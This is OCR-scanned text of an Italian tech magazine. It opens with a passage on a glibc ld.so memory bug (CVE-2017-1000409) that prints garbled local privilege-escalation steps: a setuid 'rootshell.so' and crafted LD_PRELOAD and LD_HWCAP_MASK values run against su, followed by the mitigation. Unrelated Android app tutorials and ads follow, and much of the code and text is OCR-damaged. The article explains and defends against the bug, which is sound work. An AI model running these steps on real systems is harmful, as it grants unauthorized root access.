dei pilastri del sistema, che tutti danno per affidabili, possono 
contenere vulnerabilità. Per capire cosa sia andato storto con 
Id, facciamo qualche passo indietro. 


TROPPA MEMORIA 


Di solito, i problemi nell’allocazione della memoria per una spe- 
cifica variabile, in un programma, saltano fuori quando viene al- 
locata troppa poca memoria e si ottiene un buffer overflow. In 
questo caso, la situazione è in un certo senso l’opposto. Infatti, 
nella funzione _dl_init_paths(), la libreria Id.so utilizza la classi- 
ca funzione C malloc() per allocare la memoria di un elemento 
dell’array: 


rtld search dirs.dirs[0] = (struct r search path elem *) 


malloc ((sizeof (system dirs) / sizeof (system dirs[0]))* 


round size * sizeof (struct r search path elem)); 


Come si può notare, viene utilizzato il classico costrutto sizeof 
(system_dirs) / sizeof (system_dirs[0]) per stabilire la dimensio- 
ne dell’elemento dell’array rtld_search_dirs.dir, che memorizze- 
rà i percorsi in cui si possono trovare le librerie, ad esempio "/ 
lib64" o "/usr/lib64". Ma c’è un problema: system_dirs non è un 
qualsiasi array di stringhe (che in C sono puntatori a caratteri), ma 
un vero e proprio array di. caratteri in cui i nomi delle varie cartelle 
sono separati tra loro da byte nulli. Questo perché l’array: 


static const char system dirs[] = 


SYSTEM DIRS; 


è generato da uno script AWK, che restituisce una stringa del 
tipo "/lib64/\0/usr/lib64/". Però, i byte nulli vengono conteggiati 
nella dimensione dell’array, quindi alla fine il numero di cartelle 
viene sovrastimato. La memoria in più, che viene quindi allocata, 
non viene mai utilizzata da alcuna funzione, né in lettura né in 
scrittura, perché i programmatori non avevano pensato a que- 
sta discrepanza. L'area di memoria in questione viene riempita 
più che altro da byte nulli da malloc(), ma non viene mai liberata 
dall’uso di munmap(). Questo “spreco” di memoria può essere 
aumentato usando la variabile d'ambiente LD_HWCAP_MASK, 
considerato che viene utilizzata per calcolare la dimensione di 
rtld_search_dirs.dirs. 

E non finisce qui: nella stessa funzione c’è un oggetto chiamato 
nllp, che calcola il numero delle varie cartelle specificate nella va- 
riabile d'ambiente LD_LIBRARY_PATH, e il puntatore a caratteri 
Ilp_tmp che contiene i loro nomi. Però il calcolo viene fatto in un 
modo (sulla base del simbolo punto-virgola) mentre la separazio- 
ne effettiva in un altro (si individuano le effettive cartelle). Anche 
qui, quindi, è possibile modificare la variabile d'ambiente per an- 
dare a scrivere più elementi del dovuto, che saranno puntatori ad 
aree di memoria che però non contengono il testo previsto ma del 
codice binario. 


L'EXPLOIT 


L’exploit, di cui mostriamo solo la parte più importante, prevede 
un hard link del programma su e la copia delle sue dipendenze 
nella cartella attuale: . 


env -i LD PRELOAD=nonexistent LD HWCAP_MASK=0 LD DEBUG=libs 
env 2>&1 | head 
In ‘which su? 


cp -- “ldd ./su | grep => /' | awk '{print $3} 


Micat > la.c << 


Si può poi creare un apposito shellcode e compilarlo, affidandogli 
anche il permesso di diventare root: 


"EOF" 
static void . attribute _. .((constructor)) init (void) { 
[ago] 

// setuia(0); 

// execve("/bin/sh"); 
} 
EOF 
gcc -fpic -shared -nostdlib -0s -s -o rootshell.so la.c 


chmod u+s rootshell.so 


Per chi fosse curioso, il codice completo di la.c si trova all’inizio 
del file scaricabile dalla pagina Web www.edmaster.it/url/7379. Alla 
fine, il modo migliore per eseguire l’exploit è avviare il comando 
su caricando però la finta libreria sviluppata per ottenere la shell. 


time env -i LD. LIBRARY PATH='SORIGIN/../../../../../../../../$L 
IB' LD PRELOAD='nonexistent:rootshell.so' 
LD HWCAP_MASK="$(((1<<16)-1))" ./su 


Eseguendo l’ultimo comando un paio di volte, provando a cam- 
biare i numeri tra parentesi, prima o poi l'esecuzione del pro- 
cessore verrà dirottata non su un byte nullo ma su uno dei byte 
del codice proveniente da rootshell.so, che produrrà quindi una 
shell con privilegi di root. 


LA SOLUZIONE 


Questo bug non può essere sfruttato se la protezione degli hard 
link, tramite il file /proc/sys/fs/protected_hardlinks, è abilitata. 
E lo è sulla quasi totalità delle distro GNU/Linux. Tuttavia, se 
avete utilizzato una distro “vanilla” questa opzione non è abilita- 
ta. Gli utenti comuni, quindi non devono preoccuparsi partico- 
larmente, mentre i produttori di hardware che decidono di usare 
dei sistemi operativi fatti apposta (ad esempio router minimali, 
NAS o altri dispositivi) potrebbero avere bisogno di sviluppare 
degli aggiornamenti per abilitare tale opzione. 


We tracked down this vulnerability to: 


commit ab7eb292307152e70694827b19164ff5e6d593d4 
Date: Mon May 3 21:59:35 1999 +0000 


Update. 


* elf/Makefile (trusted-dirs.st): Use gen-trusted-dirs.awk. 
* elf/gen-trusted-dins.iavk: New file. 

* elf/dl-load.c (systems dins): Moved into file scope, 
from SYSTEM _DIRS macro. 

(system dirs Len): Mew variable. 
strings. 

(fillin_rpatt): Rewrite for systens dirs being a simple string. 
Improve string comparisons. Change parameter trusted to be a flag. 
Change all callers. 

(_dt_init paths): Improve using new format for system diîrs. 


Initialize 


Contains Lengths of system dins 


which transformed "system dirs” fron an array of strings (pointers to 
characters) into an array of characters: . 


- static const char “system dirs[] = 


I | 

-#include “trusted-dirs.h" 

- NULL 

- 

+Static const char system dirsl] = SYSTEM_DIRS; 


Buffer Overflow (CVE-2917-1000409) 


II Fig. 2 © Le origini di questo bug risalgono al 1999, ed è diventato 
exploitable dopo il 2006 
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li smartphone più evoluti sono in grado di realizzare vi- 
deo che offrono una qualità quasi paragonabile a quella 
di costose videocamere. C’è chi li condivide sui social 
network o su YouTube, chi per mantenere vivi dei ricordi pre- 
ziosi, chi perché ha la passione dell’editing video...insomma, 
ogni occasione è buona per improvvisarsi registi, senza però 
portarsi dietro pesanti e ingombranti attrezzature: tutto ciò che 
serve è nelle piccole dimensioni del nostro smartphone. Senza 
dimenticare, poi, che i modelli più evoluti sono in grado di re- 
gistrare video anche in 4K e con un discreto numero di frame 
per secondo. Purtroppo però, i dispositivi più economici non di- 
spongono di una funzione che il più delle volte fa la differenza: 
la stabilizzazione video. Quando registriamo un filmato, infatti, 
la nostra mano inesperta e tremolante potrebbe rovinare il risul- 
tato finale; e se la scena è in movimento, il fastidioso “effetto 
traballante” si noterà ancora di più. 


UN DANNO IRREPARABILE? 


A tutto c’è rimedio, ma solo se si sa come fare. Google offre una 
soluzione semplice e potente di cui ancora in pochi sono a co- 
noscenza che è in grado di elaborare il video ed effettuarne una 
corretta stabilizzazione. Basteranno pochi passi e un po’ di atte- 
sa (necessaria per l’elaborazione) per vedere anche il peggiore 
dei video tremolanti trasformato in un capolavoro di stabilità. 
L’applicazione che useremo per tale scopo si chiama Google 
Foto, un’app che negli ultimi tempi sta spopolando sui disposi- 
tivi Android in quanto consente di effettuare semplici ritocchi ai 
nostri media andando a sostituire tutte quelle app che fanno le 
stesse cose ma a pagamento. Ed in più, Google Foto ci consente 
di sfruttare lo spazio di archiviazione sul cloud di Big G, esten- 
dendo così virtualmente la capacità in GB del nostro dispositivo 
o scheda micro SD. 
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FACCIAMO SPAZIO 


Possiamo liberare lo spazio occupato nella memoria del- 
lo smartphone dai media della nostra Galleria caricandoli 
sul cloud di Google. Per farlo, dalle Impostazioni di Goo- 
gle Foto selezioniamo la voce Libera spazio. Si aprirà un 
popup di avviso: ora tappiamo su Libera per portare a ter- 
mine l'operazione. 


STOP ALLA GEOLOCALIZZAZIONE 


Per rimuovere la geolocalizzazione dai propri media, an- 
diamo nelle Impostazioni di Google Foto e selezioniamo la 
voce Rimuovi geolocalizzazione. Possiamo anche miglio- 
rare le nostre preferenze a riguardo andando su Imposta- 
zioni di geolocalizzazione Google, in basso. 


CANCELLAZIONI DAL CLOUD 


Per rimuovere la geolocalizzazione dai propri media, an- 
diamo nelle Impostazioni di Google Foto e selezioniamo la 
voce Rimuovi geolocalizzazione. Possiamo anche miglio- 
rare le nostre preferenze a riguardo andando su Imposta- 
zioni di geolocalizzazione Google, in basso. 


QUANDO LO SPAZIO NON BASTA 


Abbiamo terminato lo spazio gratuito offerto da Google per 
l'archiviazione dei file? Niente paura, possiamo acquistar- 
ne altro. Dalle impostazioni selezioniamo la voce Backup 
e sincronizzazione e infine su Acquista altro spazio di 
archiviazione. 


“4 1001 18:50 PR 


Google Foto 
Google LLC 


E pei? 


ù 


Una galleria di Google più intelligente, con spazio î 
illimitato per foto e video. È 
È 


i 
si: NOVITA È 


Se non è già in- 

stallata sul nostro 
smartphone, accediamo al 
Play Store e ricerchiamo 


° l'app Google Foto. Avvia- 
i mola con un tap sull'icona 
| dalla lista delle applicazioni 
È e al messaggio di Backup e 


sincronizzazione tappiamo 
Fine. In questo modo i media 


{ della nostra Galleria verran- 
i no sincronizzati in automati- 


co sul cloud. 


A questo punto 
siamo pronti ad 


| aprire le danze: tappiamo 


E sul pulsante Stabilizza, 


gi presente inbassoa sinistra 
i dell'interfaccia grafica, 

= e attendiamo qualche 

— | secondo affinché la stabi- 


lizzazione venga effettuata 


|| con successo. Al termine 
È della procedura possiamo 
: premere nuovamente Play 
| per ammirare il risultato 
| finale e scoprire se è di 

| nostro gradimento. 


Google ci mette a 


i disposizione un’altra funzio- 


ne interessante: la possibi- 


i lità di ruotare il video, una 
i. funzione molto utile nel caso 


__l in cui avessimo registrato in 


. verticale e non in orizzontale. 
Per farlo, selezioniamo il 

| filmato, tappiamo Imposta- 

; zioni e selezioniamo Ruota, 

| inbasso a destra. Una volta 

| scelto l'angolo di rotazione, 

| tappiamo Salva per apporta- 
$ rele modifiche. 


Caricata l’inter- 
faccia dell’applicazione ci 
ritroveremo davanti tutte le 
nostre foto e i video. Cer- 
chiamo quello che ci inte- 
ressa stabilizzare e selezio- 
niamolo. Andiamo in basso 
i al video: troveremo alcuni 

pulsanti di impostazioni. 
A noi interessa il secondo; 


I 
Rd e tappiamolo e attendiamo che 


i avvenga l'elaborazione. 


Ce 


Tappiamo sul pul- 

| sante Salva, presente in alto 
gs a destra di Google Foto, e at- 
i tendiamo anche qui il tempo 
i necessario per il salvataggio 


i Possiamo decidere 
{ se caricare il video modifi- 
i cato con la massima qualità 
pia quat (pazio di rchiviazine grtio BB possibile sullo spazio cloud 
Dita neità vaso esirmsici cui siìè’— BR Offertoci da Big G [Google 


Originaie (spazio di archiviazione rimanente: MM Drive). Per farlo, andiamo in 


1468) 


i dell'app), spostiamoci su 
Backup e sincronizzazione/ 


i e selezioniamo Originale. 
Bi Tutto è pronto! 


000 
ee00 


Linux Magazine 6 £ | 


Hi ne msn 1A 


& 


SFONDO BRUTTO? 
ELIMINALO DALLE FOTO! 


Modifichiamo gli scatti del nostro smartphone togliendo lo sfondo da una foto. 
Non servono software professionali o il PC! 


gni giorno mettiamo a dura prova i 

nostri smartphone e tablet scattan- 

do foto a più non posso. Le fotoca- 
mere dei nuovi dispositivi mobile, soprattutto 
quelli di fascia alta, offrono infatti ottiche di 
altissima qualità e definizione, in grado di 
produrre foto che sono subito pronte per es- 
sere archiviate, stampate o condivise su tutti 
i social network che amiamo. Negli ultimi 
tempi però, anche i modelli di fascia media 
approdano sul mercato con camere di buona 
qualità che scattano foto dettagliate anche in 
condizioni di scarsa luminosità. Insomma, la 
fotografia digitale è ormai una costante sui 
nostri device. Capita dunque, dopo aver scat- 
tato una foto, di volerla modificare per eli- 


minare lo sfondo (operazione di scontorno) 
o eventuali soggetti intrusi. A questo punto 
ci colleghiamo al Play Store alla ricerca di 
qualche app valida per il fotoritocco, ma 
notiamo che la maggior parte di esse sono a 
pagamento e che quelle spacciate per gratuite 
hanno in realtà funzioni a pagamento all’in- 
terno. Insomma, ben presto ci si arrende a 
fare questi interventi in mobilità e si passa al 
PC, scomodando software come Gimp. 


SCONTORNI IN MOBILITÀ 


Ma siamo sicuri che non esista una soluzione 
al problema? Grazie all’applicazione gra- 
tuita che abbiamo scovato editare qualsiasi 


fotografia sarà semplice eliminandone lo 
sfondo. Basteranno pochi tap per apportare 
la modifica desiderata e salvare l’immagi- 
ne ritoccata nella galleria dello smartphone 
(senza cancellare il file originale), pron- 
ta per essere riutilizzata come preferiamo. 
L’app in questione si chiama Background 
Eraser ed è disponibile sullo store ufficiale 
di Google. Dopo aver scaricato ed avviato 
l’app, ci basta selezionare la foto da editare e, 
con un po” di pazienza selezioniamo le parti 
da eliminare ottenendo così un risultato da 
veri esperti del fotoritocco. Come già detto, 
basta solo un po’ di attenzione e precisione 
nel tocco... ma i risultati sono davvero sor- 
prendenti. Provare per credere! 


Pochi tap e il video è stabilizzato! 


Ecco come usare Google Foto per rendere più stabili i nostri video 


Background Eraser 
? handyClosetinc. 
E peci3 


esi - | 


Più di 10.000.000 di download Contiene annunci Îl 


©00 


219.298 £ Fotografia Simili k 


* App per tagliare le immagini e rendere 
trasparente lo sfondo delle fotografie. de 
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‘ che lo smartphone sia 
. connesso a Internet e 
| accediamo al Play 
Store. Scarichiamo 
| l'app Background. 
| Eraser. Apriamola e 
. carichiamo una foto [già 
scattata) con l'apposi- 
to pulsante. Eseguita 
. l'operazione vedremo 
| l'immagine nell'area di 
‘ lavoro e la possibilità 
. di selezionare alcuni 
fppuicni per effettuare 
. le varie modifiche. 


< Eraser 


DOWNLOAD 
DELL'APP 


Verifichiamo 


INIZIA LO 
SCONTORNO 
Possiamo 

% ora iniziare l’opera di 

‘. scontorno. Tutto inizia 
tappando sul pulsante 
Load a photo. Successi- 
vamente, selezioniamo 
la foto su cui eliminare 
lo sfondo. In seguito 

. tappiamo su Done, in 
alto a destra. Ora abbia- 
mo preparato il tavolo 
di lavoro e avremo 

‘. davanti alcuni pulsanti. 
Selezioniamo Manual 

e aumentiamo lo zoom 
della fotografia. 


< Saved Successfully ! 


How to use Finish 


sea White Background, Save as JPEG 


« Change Background, Superimpose 


Axy nz d 


VIA 
LO SFONDO! 
Siamo al punto 


più delicato della nostra 
opera. Selezioniamo 

le parti da eliminare 
semplicemente tappan- 
doci sopra: vedremo così 
la parte dell'immagine 
eliminata sostituita da 
quadratini grigi e bianchi 
(a indicare la trasparen- 
za dello sfondo). Conti- 
nuiamo il lavoro fino a 
quando non siamo soddi- 
sfatti. Infine, terminiamo 
cliccando su Done. 


SALVIAMO 

TUTTO! 

Abbiamo davanti 
l'anteprima della modifica 
effettuata. Per salvare il 
risultato ottenuto come 
nuova immagine nella 
Galleria dello smartpho- 
ne, tappiamo sul pulsante 
Save presente in alto a 
destra dell'interfaccia 
grafica. Per tornare indie- 
tro nelle modifiche, prima 
di salvare, basta selezio- 


. nare invece Smooth Edge 


in alto a sinistra. Infine, 
selezioniamo Finish. 


r 


o i d 
15 


‘epair Size 


Manual 


RIPRISTINO IN CORSO 

Nel cancellare lo sfondo dalla foto capita di elimi- 

nare per sbaglio anche una parte del soggetto che 
non doveva essere rimossa. Per rimediare basterà selezio- 
nare il pulsante Repair e tappare sulla:parte che si vuole 
mantenere. Per facilitarci nel lavoro possiamo regolare lo 
zoom del selettore in Repair Size. 


1512685365196.png 


ECC@LA 

NUOVA FOTO 

Ora che la foto è 
salvata nella memoria del 
telefonino, per trovarla 
è sufficiente sfogliare la 
Galleria fotografica del 
nostro device e sele- 
zionare l'album Eraser. 
Questa è la cartella in cui 
troveremo tutti i lavori 
di scontorno realizzati 
tramite l'app Background 
Eraser, che ovviamente 
potremo riutilizzare per 
altri scopi (ad esempio, 
per creare fotomontaggi). 


DIAMETRO 
DEL SELETTORE 


Selezionata la funzione Manual, 
per eliminare uno sfondo ampio è 
consigliato aumentare il diametro 
dell'apposito selettore selezionando 
la voce Manual Size fino a portarlo 
ad un livello ampio. La stessa fun- 
zione è presente anche per il coman- 
do Repair, selezionando Repair Size. 


è 


FUNZIONE ZOOM 


Selezioniamo la funzione dello zoom 
per ingrandire la foto e riuscire ad 


eliminare le varie parti in modo mol- 
to più preciso. Le foto ricche di det- 
tagli e con contorni irregolari non 
possono essere editate se non con 
questa indispensabile funzione. 


ELIMINAZIONE 
AUTOMATICA 


Non vuoi eseguire l'eliminazio- 
ne dello sfondo in modo manuale e 
quindi risparmiare tempo? Ci pensa 
la funzione Auto. Una volta selezio- 
nata e portato il selettore sull'im- 
magine, se tappiamo vedremo che 
lo sfondo verrà tolto in modo auto- 


matico. È vero che questa funzione 
permette di risparmiare tempo, ma 
a differenza del selettore Manual 
risulta meno precisa. È probabile 
quindi che si renderà necessaria una 
rifinitura manuale. 


CURSORE DI OFFSET 


Possiamo modificare la posizione 
del cursore di offset semplicemente 
cambiando il parametro presente in 
alto nell'apposita sezione. Trasci- 
nando il cursore a zero la posizio- 
ne diminuirà, mentre portandolo al 
massimo si allontanerà. 
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TRAFFICO DATI 


SOTTO CONTROLLO © 


Datally è l’app che ti aiuta a monitorare la quantità del traffico 
dati consumato e di risparmiare preziosi GB! 


Izi la mano chi non si è mai ritrovato improvvisamente a corto di GB 
Asi riuscire a capirne il motivo. Si tratta di una situazione frequente 
he spesse volte lascia letteralmente incredulo l’utente, ma che nella 

maggior parte dei casi è imputabile a un impiego sconsiderato del traffico dati 
da parte di questa o di quell’altra app. Per averne la certezza occorrerebbe però 
impiegare uno strumento apposito, un’ulteriore applicazione in grado di moni- 
torare il traffico e di avvertire l’utente in caso di anomalie. Per quel che concer- 
ne il versante Android, di risorse di questo tipo il Play Store ne è pieno zeppo. 


Datally: usalo così 


Pochi tap e siamo Mb a o 


fl o 


Non tutte però sono precise e di facile consultazione come invece dovrebbe es- 
sere questo tipo di tool e inoltre in alcuni casi si tratta persino di soluzioni a pa- 
gamento. Diverso è però il caso di Google Datally, la nuova app realizzata dal 
colosso di Mountain View appositamente per questo scopo. Google ha lanciato 
questa nuova applicazione gratuita destinata a tutti gli smartphone Android per 
consentirci di controllare i GB di traffico consumati dalle altre applicazioni che 
abbiamo installate sul nostro dispositivo, in modo tale da capire dove interve- 
nire per risparmiare sulla connessione dati. Scopriamo subito come utilizzarla. 
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<— Manage data 


SUR 


By registering, you accept Google's Terms of 
Seryice and Privacy Policy. 


Datally requests certain permissions to help you 
manage your mobile data. Lear more 


Chrome 
€ ® 


Less than 0,1 MB 


PATRIA 


SETUP 
O i Accediamo al Play Store, cer- 

chiamo Datally mediante l'ap- 
posito campo che sta in alto, selezionia- 
mo l'app dall'elenco e facciamo tap sui 
pulsanti Installa e Accetta. Accediamo 
poi alla schermata del launcher in cui 
ci sono tutte le app installate e apriamo 
quella appena scaricata. 


to Gi 


base quotidiana. 


CLI 

0° 
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Google Play Services 


da “SVITARE STA @) Dil) (3) 
0,1 MB Ù 
,  AndroidOS i Ria 
Start saving with Datally i ——_— MATAGT Se BIO 
RI 


IN CORSO _ — QUANTIGB? 

P, Avviamo Datally e autoriz- 
ziamola ad accedere ai dati 

di utilizzo. Nella schermata successiva 

potremo controllare i MB complessi- 

vamente consumati durante il giorno, 

mentre tappando su Manage data anche 

quelli consumati dalle singole app su 


0,4... 


12AM 12PM 
Moming Noon 
Mobile data used today 
< los Today v 
Data Saver on 
Other apps using data a 


Let your friends know they too 
can save data with Datally 


You're saving mobile data with Data 
Saver. 
nre i ” delle: ue deiibib afivibtaciio ie 
RI ANCORA 
03 


PIU RISPARMIO! 

Per abilitare l'opzione Data 
Saver portiamo invece su ON l'interrut- 
tore che si trova nella schermata prin- 
cipale dell'app e concediamo i permessi 
richiesti. Quando la funzione risulta 
attivata consente di risparmiare sino al 
30% del consumo medio dei GB. 
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JENERAL 
ATA 
ROTECTION 
EGULATION 


0) 1 CI ASPETTA 


II GDPR diventerà obbligatorio. 

Recenti studi evidenziano che solo il 9% 
delle aziende ha avviato un progetto di 
adeguamento alla normativa. 

Sanzioni previste: fino al 4% del 
fatturato annuale o 20MLE 

Alcune novità del regolamento Eu: 
l'accountability, il privacy impact 
assessment, ll concetto dell'incauto 


affidamento, il danno reputazionale e 


l'obbligo della tenuta di un registro dei 
trattamenti, il diritto all'oblio, la 
portabilità dei dati, la figura del DPO. 


be. 
aconet 


applications communications network 


02 PERRENDERTI COMPLANT 
Assessment aziendale-> Audit action-> Sicurezza Informatica continuos monitor. 


Valuteremo la tua azienda e consiglieremo le azioni da intraprendere per adempiere 
alla normativa. Attiveremo soluzioni di sicurezza Next Generation per controllare 
H24 eventuali vulnerabilità che possano rendere attaccabile la tua rete (es. 
WannaCry Sanità Inglese). Ci proponiamo come DPO in outsourcing. 


Data Protection Officer - Privacy Consultant e Auditor Certificated 


ld 


Numero Verde per info: gdpr@aconet.it 


800.123.539 


acta Lat 


2.94 e prova on line a realizzare il tuo sito: 


CANONE 
ANNUO 


OOEASY 


I tuo sito in pochi step. 


SELEZIONA 
IL LAYOUT 
sti TTT] sua i INSERISCI TESTI 
anni toc. EIMMAGINI © 


« Oltre 30 lingue 


a ù « Tecnologia Drag&Drop 
,° e” =» Grafica ottimizzata su 
Pi desktop e dispositivi 
SCEGLI ,° sd mobili 
rà 
IL TUO DOMINIO, 


rà 
3 1 | 
ld Sito 
IP... Ba | perfetto 
i su Desktop, 


Smartphone 


« Dominio =  ùY i 
| e Tablet 


« Posta elettronica 
=» Hosting tutto incluso 


HOSTEKW 


HOSTING TECHNOLOGIES 


vai su www.hostek.it 


se sei soddisfatto acquistalo subito! 


